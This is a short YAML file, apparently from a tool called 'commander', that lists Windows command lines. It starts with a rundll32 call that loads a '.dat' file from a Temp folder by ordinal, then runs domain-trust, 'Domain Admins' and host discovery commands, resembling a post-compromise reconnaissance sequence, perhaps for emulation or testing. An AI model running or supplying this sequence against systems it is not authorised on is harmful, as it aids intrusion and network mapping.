Files
commander/old_scripts/commands.yaml
2025-06-09 19:34:56 +09:00

30 lines
685 B
YAML

commands:
- name: easygoing rundll
command: 'rundll32 C:\\Users\\[REDACTED]\\AppData\\Local\\Temp\\easygoing.dat,#1'
- name: nltest all_trusts
command: 'nltest /domain_trusts /all_trusts'
- name: nltest domain_trusts
command: 'nltest /domain_trusts'
- name: net view domain
command: 'net view /all /domain'
- name: net view
command: 'net view /all'
- name: domain admins
command: 'net group "Domain Admins" /domain'
- name: current codepage
command: 'cmd.exe /c chcp >&2'
- name: ipconfig
command: 'ipconfig /all'
- name: workstation config
command: 'net config workstation'
- name: system info
command: 'systeminfo'